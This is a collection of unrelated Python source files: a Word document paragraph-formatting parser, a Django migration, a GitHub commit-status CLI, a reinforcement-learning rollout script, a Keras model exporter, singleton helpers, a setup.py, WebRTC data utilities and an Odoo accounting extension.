:param tree: BeautifulSoup tree with properties
"""
# firstLine describes additional indentation to current indentation, if hanging is present firstLine is ignored
# firstLineChars differs from firstLine only in measurement (one hundredths of a character unit)
# hanging removes indentation from current indentation (analogous hangingChars)
# start describes classical indentation (startChars)
# left isn't specified in the documentation, F
# main measurement 1/1440 of an inch
# 1 inch is 12 char units, 1/100 char unit = 1/1200 inch = 1.2 * (1/1440 of an inch)
attributes = {"firstLine": 0, "firstLineChars": 0, "hanging": 0, "hangingChars": 0,
"start": 0, "startChars": 0, "left": 0}
if tree.ind:
for attribute in attributes:
attributes[attribute] = int(tree.ind.get("w:{}".format(attribute), 0))
else:
return
indentation = 0
if attributes["left"] != 0:
indentation = attributes["left"]
elif attributes["start"] != 0:
indentation = attributes["start"]
elif attributes["startChars"] != 0:
indentation = attributes["startChars"] / 1.2
if attributes["firstLine"] != 0 and attributes["hanging"] == 0:
indentation += attributes["firstLine"]
if attributes["firstLineChars"] != 0 and attributes["hangingChars"] == 0:
indentation += attributes["firstLineChars"] / 1.2
if attributes["hanging"] != 0:
indentation -= attributes["hanging"]
elif attributes["hangingChars"] != 0:
indentation -= attributes["hangingChars"] / 1.2
old_properties.indentation = indentation
def change_size(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
"""
changes old properties: size if it was found in tree
:param old_properties: Paragraph or Run
:param tree: BeautifulSoup tree with properties
"""
if tree.sz:
old_properties.size = int(tree.sz.get('w:val', old_properties.size))
def change_jc(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
"""
changes old_properties: jc (alignment) if tag jc was found in tree
:param old_properties: Paragraph
:param tree: BeautifulSoup tree with properties
"""
# alignment values: left, right, center, both
# left is default value
if not tree.jc:
return
if tree.bidi:
bidi_tag = tree.bidi.get('w:val', True)
right_to_left = check_if_true(bidi_tag) if isinstance(bidi_tag, str) else bidi_tag
else:
right_to_left = False
jc_tag = tree.jc.get('w:val', old_properties.jc)
if jc_tag == 'both':
old_properties.jc = 'both'
elif jc_tag == 'center':
old_properties.jc = 'center'
elif jc_tag == 'right':
old_properties.jc = 'right'
elif jc_tag == 'end' and not right_to_left:
old_properties.jc = 'right'
elif jc_tag == 'start' and right_to_left:
old_properties.jc = 'right'
def change_caps(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
"""
changes old_properties: caps if tag caps was found in tree
:param old_properties: Paragraph or Run
:param tree: BeautifulSoup tree with properties
"""
if not tree.caps:
return
caps_tag = tree.caps.get('w:val', True)
old_properties.caps = check_if_true(caps_tag) if isinstance(caps_tag, str) else caps_tag
def change_spacing(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
"""
changes old_properties: spacing_before, spacing_after if tag spacing was found in tree
:param old_properties: Paragraph
:param tree: BeautifulSoup tree with properties
"""
# tag <spacing> may have the following attributes for spacing between paragraphs:
# after / before (measured in twentieths of a point), ignored if afterLines or afterAutospacing are specified
# afterAutospacing / beforeAutospacing (we set 0 if specified) if is specified, other attributes are ignored
# afterLines / beforeLines (measured in one hundredths of a line)
# if we have spacing after value for the previous paragraph and spacing before value for the next paragraph
# we choose maximum between these two values
if not tree.spacing:
return
before, after = 0, 0
before_autospacing = tree.spacing.get("w:beforeAutospacing", False)
before_autospacing = check_if_true(before_autospacing) if before_autospacing else before_autospacing
after_autospacing = tree.spacing.get("w:afterAutospacing", False)
after_autospacing = check_if_true(after_autospacing) if after_autospacing else after_autospacing
if not before_autospacing:
before_lines = tree.spacing.get("w:beforeLines", False)
before_lines = int(before_lines) if before_lines else before_lines
if not before_lines:
before_tag = tree.spacing.get("w:before", False)
before = int(before_tag) if before_tag else before
else:
before = before_lines
if not after_autospacing:
after_lines = tree.spacing.get("w:afterLines", False)
after_lines = int(after_lines) if after_lines else after_lines
if not after_lines:
after_tag = tree.spacing.get("w:after", False)
after = int(after_tag) if after_tag else after
else:
after = after_lines
old_properties.spacing_before = before
old_properties.spacing_after = after
|
# Generated by Django 3.0.5 on 2021-01-27 14:35
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Visitor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dtRegistered', models.DateTimeField(auto_now_add=True)),
('dtBirth', models.DateField(max_length=8)),
('strFullName', models.CharField(max_length=256)),
('strGovtIdNo', models.CharField(max_length=16)),
('eGender', models.CharField(choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Other')], default='X', max_length=2)),
],
options={
'ordering': ['dtRegistered'],
},
),
]
|
"""
Usage:
github-commit-status -c <commit-hash> -s <status> -u <github-username> -p <github-password> -r <github_repo> --url <URL> --context <context> -d "<description>"
github-commit-status -c <commit-hash> -s <status> -t <github-token> -r <github_repo> --url <URL> --context <context> -d "<description>"
Options:
-c <commit-hash>, --commit-hash <commit-hash> Github commit hash
-s <status>, --status <status> Status to set [pending, success, error, or failure]
-u <username>, --username <username> github username
-p <password>, --password <password> github password
-t <token>, --token <token> github access token
-r <repository>, --repo <repository> github repository
-d <description> --description <description> description of the status
--url <url> URL to refer back to
--context <context> The context of the status. Typically the name of the service creating the status.
"""
from docopt import docopt
from github import Github
def main(argv=None, test=False):
arguments = docopt(__doc__, argv=argv)
status = arguments['--status']
commit = arguments['--commit-hash']
user = arguments['--username']
password = arguments['--password']
token = arguments['--token']
url = arguments['--url']
repo = arguments['--repo']
context = arguments['--context']
description = arguments['--description']
print "Setting status %s for commit %s." % (status, commit)
if token:
g = Github(token)
elif user and password:
g = Github(user,password)
r = g.get_repo(repo)
c = r.get_commit(commit)
s = c.create_status(status, target_url=url, description=description, context=context)
if test:
return s
if __name__ == "__main__":
main() |
import os
import joblib
import numpy as np
from rlkit.samplers.util import rollout
files = dict(
reach_left=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-left/09-14_pusher-3dof-reacher-naf-yolo_left_2017_09_14_17_52_45_0010/params.pkl'
),
reach_right=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-right/09-14_pusher-3dof-reacher-naf-yolo_right_2017_09_14_17_52_45_0016/params.pkl'
),
reach_middle=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-middle/09-14_pusher-3dof-reacher-naf-yolo_middle_2017_09_14_17_52_45_0013/params.pkl'
),
reach_bottom=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-bottom/09-14_pusher-3dof-reacher-naf-yolo_bottom_2017_09_14_17_52_45_0019/params.pkl'
),
merge_bottom_left=(
'/home/vitchyr/git/rllab-rail/railrl/data/local/09-14-1-combine-naf-policies-left/09-14_1-combine-naf-policies-left_2017_09_14_21_42_24_0000--s-68077/params.pkl'
),
merge_bottom_right=(
'/home/vitchyr/git/rllab-rail/railrl/data/local/09-14-1-combine-naf-policies-right/09-14_1-combine-naf-policies-right_2017_09_14_21_42_29_0000--s-42677/params.pkl'
),
merge_bottom_middle=(
'/home/vitchyr/git/rllab-rail/railrl/data/local/09-14-1-combine-naf-policies-middle/09-14_1-combine-naf-policies-middle_2017_09_14_21_42_27_0000--s-91696/params.pkl'
),
reach_bottom_left=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-bottom-left/09-14_pusher-3dof-reacher-naf-yolo_bottom-left_2017_09_14_17_52_45_0001/params.pkl'
),
reach_bottom_right=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-bottom-right/09-14_pusher-3dof-reacher-naf-yolo_bottom-right_2017_09_14_17_52_45_0007/params.pkl'
),
reach_bottom_middle=(
'/home/vitchyr/git/rllab-rail/railrl/data/s3/09-14-pusher-3dof-reacher-naf-yolo-bottom-middle/09-14_pusher-3dof-reacher-naf-yolo_bottom-middle_2017_09_14_17_52_45_0005/params.pkl'
),
)
for name, full_path in files.items():
name = name.replace('_', '-') # in case Tuomas's script cares
data = joblib.load(full_path)
if 'policy' in data:
policy = data['policy']
else:
policy = data['naf_policy']
env = data['env']
print(name)
pos_lst = list()
for i in range(100):
path = rollout(env, policy, max_path_length=300, animated=False)
pos_lst.append(path['final_observation'][-3:-1])
pos_all = np.stack(pos_lst)
outfile = os.path.join('data/papers/icra2018/results/pusher/naf',
name + '.txt')
np.savetxt(outfile, pos_all)
|
import numpy as np
from tensorflow.python.keras.models import Model
from tensorflow.python.keras.layers import Dense
from tensorflow.python.keras import backend as K
import tensorflow as tf
from keras.applications.mobilenet_v2 import MobileNetV2
#from keras.models import load_model
# target model
base_model = MobileNetV2(include_top=True, weights='imagenet')
# target model from hdf5
#base_model = load_model("input.hdf5")
# model input and output
input_shape = [1, 224, 224, 3]
input_node_name = "mobilenetv2_1.00_224/Conv1_pad/Pad"
output_node_name = "mobilenetv2_1.00_224/Logits/Softmax"
output_folder = "./models"
output_name = "output.pb"
# export from tensorflow
tf.keras.backend.set_learning_phase(0)
x = tf.placeholder(tf.float32, input_shape, name="model_input")
y = base_model(x)
base_model.summary()
# trainable & uninitialized variables
uninitialized_variables = [v for v in tf.global_variables() \
if not hasattr(v, '_keras_initialized') or not v._keras_initialized]
# initialization
sess = K.get_session()
gd = sess.graph.as_graph_def()
print("node list")
for node in gd.node:
print(node)
sess.run(tf.variables_initializer(uninitialized_variables))
frozen_graph_def = tf.graph_util.convert_variables_to_constants(sess,gd,[output_node_name])
tf.train.write_graph(frozen_graph_def,output_folder,name=output_name,as_text=False)
|
"""Translation using local data given at initialization."""
from rics.translation.offline._format import Format
from rics.translation.offline._format_applier import DefaultFormatApplier, FormatApplier
from rics.translation.offline._magic_dict import MagicDict
from rics.translation.offline._placeholder_overrides import PlaceholderOverrides
from rics.translation.offline._translation_map import TranslationMap
__all__ = ["Format", "FormatApplier", "DefaultFormatApplier", "PlaceholderOverrides", "TranslationMap", "MagicDict"]
|
# -*- coding:utf-8 -*-
# author: Cone
# datetime: 2020-01-10 17:09
# software: PyCharm
def singleton(cls):
_instance = {}
def inner():
if cls not in _instance:
_instance[cls] = cls()
return _instance[cls]
return inner
class Singleton(object):
def __init__(self, cls):
self._cls = cls
self._instance = {}
def __call__(self):
if self._cls not in self._instance:
self._instance[self._cls] = self._cls()
return self._instance[self._cls]
class SingletonMeta(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
|
from distutils.core import setup
try:
from setuptools import setup
except:
pass
setup(
name = "kiss.py",
version = "1.0.0",
author = "Stanislav Feldman",
description = ("MVC web framework in Python with Gevent, Jinja2, Werkzeug"),
url = "http://stanislavfeldman.github.com/kiss.py/",
keywords = "web framework gevent jinja2 werkzeug orm oauth socialauth vkontakte facebook google yandex",
packages=[
"kiss", "kiss.controllers", "kiss.core", "kiss.views", "kiss.models"
],
install_requires = ["gevent", "jinja2", "compressinja", "beaker", "werkzeug", "putils", "jsmin", "pyScss", "sqlalchemy == 0.7.8", "elixir", "jsonpickle", "pev", "requests", "pycrypto"],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries :: Application Frameworks"
],
)
|
__author__ = 'thorsteinn'
from dnv_exchange.input_files.dbDNV1 import db as db1
from dnv_exchange.input_files.dbDNV2 import db as db2
from dnv_exchange.input_files.dbDNV3 import db as db3
from dnv_exchange.input_files.dbDNV4 import db as db4
from dnv_exchange.input_files.dbDNV5 import db as db5
from dnv_exchange.input_files.dbDNV6 import db as db6
from dnv_exchange.input_files.dbDNV7 import db as db7
from dnv_exchange.input_files.dbDNV8 import db as db8
from dnv_exchange.input_files.eimskipaskip_DNV import db as db9
from db_to_file_helpers.jsonDicts_to_file import db_to_file
db = {}
db.update(db1)
db.update(db2)
db.update(db3)
db.update(db4)
db.update(db5)
db.update(db6)
db.update(db7)
db.update(db8)
db.update(db9)
db_to_file(db, '../output_files/dnv_db_get_1.txt')
|
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Data access utility functions and classes.
"""
import json
import os
def MakeDirectory(path):
"""Makes a directory recursively without rising exceptions if existing.
Args:
path: path to the directory to be created.
"""
if os.path.exists(path):
return
os.makedirs(path)
class Metadata(object):
"""Data access class to save and load metadata.
"""
def __init__(self):
pass
_AUDIO_TEST_DATA_FILENAME = 'audio_test_data.json'
@classmethod
def LoadAudioTestDataPaths(cls, metadata_path):
"""Loads the input and the reference audio track paths.
Args:
metadata_path: path to the directory containing the metadata file.
Returns:
Tuple with the paths to the input and output audio tracks.
"""
metadata_filepath = os.path.join(
metadata_path, cls._AUDIO_TEST_DATA_FILENAME)
with open(metadata_filepath) as f:
return json.load(f)
@classmethod
def SaveAudioTestDataPaths(cls, output_path, **filepaths):
"""Saves the input and the reference audio track paths.
Args:
output_path: path to the directory containing the metadata file.
Keyword Args:
filepaths: collection of audio track file paths to save.
"""
output_filepath = os.path.join(output_path, cls._AUDIO_TEST_DATA_FILENAME)
with open(output_filepath, 'w') as f:
json.dump(filepaths, f)
class AudioProcConfigFile(object):
"""Data access to load/save audioproc_f argument lists.
The arguments stored in the config files are used to control the APM flags.
"""
def __init__(self):
pass
@classmethod
def Load(cls, filepath):
"""Loads a configuration file for audioproc_f.
Args:
filepath: path to the configuration file.
Returns:
A dict containing the configuration.
"""
with open(filepath) as f:
return json.load(f)
@classmethod
def Save(cls, filepath, config):
"""Saves a configuration file for audioproc_f.
Args:
filepath: path to the configuration file.
config: a dict containing the configuration.
"""
with open(filepath, 'w') as f:
json.dump(config, f)
class ScoreFile(object):
"""Data access class to save and load float scalar scores.
"""
def __init__(self):
pass
@classmethod
def Load(cls, filepath):
"""Loads a score from file.
Args:
filepath: path to the score file.
Returns:
A float encoding the score.
"""
with open(filepath) as f:
return float(f.readline().strip())
@classmethod
def Save(cls, filepath, score):
"""Saves a score into a file.
Args:
filepath: path to the score file.
score: float encoding the score.
"""
with open(filepath, 'w') as f:
f.write('{0:f}\n'.format(score))
|
# -*- coding: utf-8 -*-
from odoo import models, fields
class AccountMove(models.Model):
_inherit = 'account.move'
repair_ids = fields.One2many('repair.order', 'invoice_id', readonly=True, copy=False)
def unlink(self):
repairs = self.sudo().repair_ids.filtered(lambda repair: repair.state != 'cancel')
if repairs:
repairs.sudo(False).state = '2binvoiced'
return super().unlink()
class AccountMoveLine(models.Model):
_inherit = 'account.move.line'
repair_line_ids = fields.One2many('repair.line', 'invoice_line_id', readonly=True, copy=False)
repair_fee_ids = fields.One2many('repair.fee', 'invoice_line_id', readonly=True, copy=False)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.